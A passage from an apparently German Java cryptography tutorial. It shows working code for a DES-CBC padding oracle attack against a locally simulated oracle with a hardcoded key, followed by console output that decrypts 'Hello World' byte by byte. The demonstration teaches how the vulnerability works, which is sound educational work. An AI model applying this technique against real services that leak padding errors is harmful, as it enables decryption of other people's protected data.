Byte 01 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[1-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } P201 = (byte) ((byte) (8) ^ C1[1 - 1] ^ Cb1[1 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[1] ist:" + P201 + " Hex:x" + String.format("%02X", P201)); } // mathematik P2t[1 - 1] = P201; System.out.println("Treffer für Cb1[1]:x" + String.format("%02X", iGesichert) + " Berechnung P2[1]:x" + String.format("%02X", P201) + " = P'2[1]=:x08" + " ^ C1[1]=:x" + String.format("%02X", (C1[1 - 1])) + " ^ C'[1]=:x" + String.format("%02X", (Cb1[1 - 1])) + " P2:" + printByteArray(P2t, 17)); //ergebnis byte[] decrypted1Byte = { P201, P202, P203, P204, P205, P206, P207, P208 }; String decrypted1String = aBtS(decrypted1Byte); System.out.println("Umwandlung von P2t:" + printByteArray(P2t, 17) + "in einen String:" + decrypted1String); System.out.println( "= = = Durchprobieren der Modifikation am desOracle mit unterschiedlichen Werten abgeschlossen = = ="); System.out.println("= = = Entschlüsselung des gesamten Strings = = ="); // sicherung der daten in D System.arraycopy(decrypted1Byte, 0, D, 0, decrypted1Byte.length); System.arraycopy(decrypted2Byte, 0, D, decrypted1Byte.length, decrypted2Byte.length); String decryptedString = aBtS(D); System.out.println("Entschlüsselter String:" + decryptedString); System.out.println("= = = Entschlüsselung des gesamten Strings abgeschlossen = = ="); System.out.println("G04b DES Padding Oracle beendet"); } public static boolean desCbcPaddingOracle(byte[] iv, byte[] ciphertext) { // diese routine gibt das ergebnis des padding oracles zurück // ergebnis true = entschlüsselung ist möglich // ergebnis false = entschlüsselung ist nicht möglich // der schlüssel ist eingebaut wie bei einem entfernten rechner, der auch // den schlüssel kennen muss byte[] key = "mydeskey".getBytes(); boolean status = true; // true decryption ohne fehler, false = decryption mit fehler Cipher desCipher; try { desCipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); SecretKeySpec secretKeySpec = new SecretKeySpec(key, "DES"); IvParameterSpec ivParameterSpec = new IvParameterSpec(iv); desCipher.init(Cipher.DECRYPT_MODE, secretKeySpec, ivParameterSpec); // hinweis das ergebnis decrypt wird nicht weiter benutzt // hier ist nur der fehlerteil interessant @SuppressWarnings("unused") byte[] decrypt = desCipher.doFinal(ciphertext); } catch (IllegalBlockSizeException e) { e.printStackTrace(); status = false; } catch (BadPaddingException e) { status = false; } catch (NoSuchAlgorithmException | NoSuchPaddingException e) { e.printStackTrace(); status = false; } catch (InvalidKeyException | InvalidAlgorithmParameterException e) { e.printStackTrace(); status = false; } return status; } // public static String asciiBytesToString( byte[] bytes ) public static String aBtS(byte[] bytes) { if ((bytes == null) || (bytes.length == 0)) { return ""; } char[] result = new char[bytes.length]; for (int i = 0; i < bytes.length; i++) { result[i] = (char) bytes[i]; } return new String(result); } public static byte[] decodeHexString(String hexString) { if (hexString.length() % 2 == 1) { throw new IllegalArgumentException("Invalid hexadecimal String supplied."); } byte[] bytes = new byte[hexString.length() / 2]; for (int i = 0; i < hexString.length(); i += 2) { bytes[i / 2] = hexToByte(hexString.substring(i, i + 2)); } return bytes; } public static byte hexToByte(String hexString) { int firstDigit = toDigit(hexString.charAt(0)); int secondDigit = toDigit(hexString.charAt(1)); return (byte) ((firstDigit << 4) + secondDigit); } private static int toDigit(char hexChar) { int digit = Character.digit(hexChar, 16); if (digit == -1) { throw new IllegalArgumentException("Invalid Hexadecimal Character: " + hexChar); } return digit; } public static String printByteArray(byte[] byteData, int numberPerRow) { // rückgabe eines strings String returnString = ""; String rawString = printHexBinary(byteData); int rawLength = rawString.length(); int i = 0; int j = 1; int z = 0; for (i = 0; i < rawLength; i++) { z++; returnString = returnString + rawString.charAt(i); if (j == 2) { returnString = returnString + " "; j = 0; } j++; if (z == (numberPerRow * 2)) { returnString = returnString + "\n"; z = 0; } } return returnString; } public static String printHexBinary(byte[] bytes) { final char[] hexArray = "0123456789ABCDEF".toCharArray(); char[] hexChars = new char[bytes.length * 2]; for (int j = 0; j < bytes.length; j++) { int v = bytes[j] & 0xFF; hexChars[j * 2] = hexArray[v >>> 4]; hexChars[j * 2 + 1] = hexArray[v & 0x0F]; } return new String(hexChars); } } |
Das ist die (erschreckende) und sehr schnelle Ausgabe auf der Konsole:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 |
G04b DES Padding Oracle = = = Erstellung bzw. Übernahme der Variablen = = = Var IV [Länge:8 Byte] :00 00 00 00 00 00 00 00 Var C [Länge:16 Byte]:83 E1 0D 51 E6 D1 22 CA 3F AF 08 9C 7A 92 4A 7B Var C1 [Länge:8 Byte] :83 E1 0D 51 E6 D1 22 CA Var C2 [Länge:8 Byte] :3F AF 08 9C 7A 92 4A 7B = = = Erstellung der Variablen abgeschlossen = = = = = = Test des desPaddingOracles mit Block C2 = = = desPaddingOracle mit Eingabe:83 E1 0D 51 E6 D1 22 CA 3F AF 08 9C 7A 92 4A 7B :true desPaddingOracle mit Eingabe:83 E1 0D 51 E6 D1 22 CA 3F AF 08 9C 7A 92 4A 7A :false = = = Test des desPaddingOracles abgeschlossen = = = = = = Erstellung einer neuen Eingabezeile für das desPaddingOracle = = = Variable Cb1 [Länge:8 Byte] :00 00 00 00 00 00 00 00 Variable C2 [Länge:8 Byte] :3F AF 08 9C 7A 92 4A 7B Variable Cb2 [Länge:16 Byte]:00 00 00 00 00 00 00 00 3F AF 08 9C 7A 92 4A 7B desPaddingOracle mit Eingabe:00 00 00 00 00 00 00 00 3F AF 08 9C 7A 92 4A 7B :false = = = Test der Modifikation am desPaddingOracle abgeschlossen = = = = = = Durchprobieren der Modifikation am desPaddingOracle mit unterschiedlichen Werten = = = Cb1 Schleife :00 00 00 00 00 00 00 00 C2 Original :3F AF 08 9C 7A 92 4A 7B Cb2 Cb1 + C2 :00 00 00 00 00 00 00 00 3F AF 08 9C 7A 92 4A 7B = Byte 08 mit Padding x01 = Treffer für Cb1[8]:xCE Berechnung P2[8]:x05 = P'2[8]=:x01 ^ C1[8]=:xCA ^ C'[8]=:xCE P2:00 00 00 00 00 00 00 05 = Byte 07 mit Padding x02 = Treffer für Cb1[7]:x25 Berechnung P2[7]:x05 = P'2[7]=:x02 ^ C1[7]=:x22 ^ C'[7]=:x25 P2:00 00 00 00 00 00 05 05 = Byte 06 mit Padding x03 = Treffer für Cb1[6]:xD7 Berechnung P2[6]:x05 = P'2[6]=:x03 ^ C1[6]=:xD1 ^ C'[6]=:xD7 P2:00 00 00 00 00 05 05 05 = Byte 05 mit Padding x04 = Treffer für Cb1[5]:xE7 Berechnung P2[5]:x05 = P'2[5]=:x04 ^ C1[5]=:xE6 ^ C'[5]=:xE7 P2:00 00 00 00 05 05 05 05 = Byte 04 mit Padding x05 = Treffer für Cb1[4]:x51 Berechnung P2[4]:x05 = P'2[4]=:x05 ^ C1[4]=:x51 ^ C'[4]=:x51 P2:00 00 00 05 05 05 05 05 = Byte 03 mit Padding x06 = Treffer für Cb1[3]:x6F Berechnung P2[3]:x64 = P'2[3]=:x06 ^ C1[3]=:x0D ^ C'[3]=:x6F P2:00 00 64 05 05 05 05 05 = Byte 02 mit Padding x07 = Treffer für Cb1[2]:x8A Berechnung P2[2]:x6C = P'2[2]=:x07 ^ C1[2]=:xE1 ^ C'[2]=:x8A P2:00 6C 64 05 05 05 05 05 = Byte 01 mit Padding x08 = Treffer für Cb1[1]:xF9 Berechnung P2[1]:x72 = P'2[1]=:x08 ^ C1[1]=:x83 ^ C'[1]=:xF9 P2:72 6C 64 05 05 05 05 05 Umwandlung von P2t:72 6C 64 05 05 05 05 05 in einen String:rld = = = Durchprobieren der Modifikation am desOracle mit unterschiedlichen Werten abgeschlossen = = = = = = Test des desOracles mit Block C1 = = = Var Cb2 [Länge:16 Byte]:000000000000000083E10D51E6D122CA desOracle mit Eingabe :000000000000000083E10D51E6D122CA:false = = = Test der Modifikation am desOracle abgeschlossen = = = = = = Durchprobieren der Modifikation am desPaddingOracle mit unterschiedlichen Werten = = = Cb1 Schleife :00 00 00 00 00 00 00 00 C2 Original :83 E1 0D 51 E6 D1 22 CA Cb2 Cb1 + C2 :00 00 00 00 00 00 00 00 83 E1 0D 51 E6 D1 22 CA = Byte 08 mit Padding x01 = Treffer für Cb1[8]:x6E Berechnung P2[8]:x6F = P'2[8]=:x01 ^ C1[8]=:x00 ^ C'[8]=:x6E P2:00 00 00 00 00 00 00 6F = Byte 07 mit Padding x02 = Treffer für Cb1[7]:x55 Berechnung P2[7]:x57 = P'2[7]=:x02 ^ C1[7]=:x00 ^ C'[7]=:x55 P2:00 00 00 00 00 00 57 6F = Byte 06 mit Padding x03 = Treffer für Cb1[6]:x23 Berechnung P2[6]:x20 = P'2[6]=:x03 ^ C1[6]=:x00 ^ C'[6]=:x23 P2:00 00 00 00 00 20 57 6F = Byte 05 mit Padding x04 = Treffer für Cb1[5]:x6B Berechnung P2[5]:x6F = P'2[5]=:x04 ^ C1[5]=:x00 ^ C'[5]=:x6B P2:00 00 00 00 6F 20 57 6F = Byte 04 mit Padding x05 = Treffer für Cb1[4]:x69 Berechnung P2[4]:x6C = P'2[4]=:x05 ^ C1[4]=:x00 ^ C'[4]=:x69 P2:00 00 00 6C 6F 20 57 6F = Byte 03 mit Padding x06 = Treffer für Cb1[3]:x6A Berechnung P2[3]:x6C = P'2[3]=:x06 ^ C1[3]=:x00 ^ C'[3]=:x6A P2:00 00 6C 6C 6F 20 57 6F = Byte 02 mit Padding x07 = Treffer für Cb1[2]:x62 Berechnung P2[2]:x65 = P'2[2]=:x07 ^ C1[2]=:x00 ^ C'[2]=:x62 P2:00 65 6C 6C 6F 20 57 6F = Byte 01 mit Padding x08 = Treffer für Cb1[1]:x40 Berechnung P2[1]:x48 = P'2[1]=:x08 ^ C1[1]=:x00 ^ C'[1]=:x40 P2:48 65 6C 6C 6F 20 57 6F Umwandlung von P2t:48 65 6C 6C 6F 20 57 6F in einen String:Hello Wo = = = Durchprobieren der Modifikation am desOracle mit unterschiedlichen Werten abgeschlossen = = = = = = Entschlüsselung des gesamten Strings = = = Entschlüsselter String:Hello World = = = Entschlüsselung des gesamten Strings abgeschlossen = = = G04b DES Padding Oracle beendet |
Alle Quellcodes zu den Unsicherheiten findet Ihr zum Download in meinem Github-Repository, welches Ihr über diesen Link erreicht: https://github.com/java-crypto/G-Unsicherheit. Alle Programme sind sowohl unter Java 8 als auch unter Java 11 lauffähig.
Die Lizenz zum obigen Beispiel findet Ihr auf der eigenen Lizenz-Seite.
Letzte Aktualisierung: 26.09.2019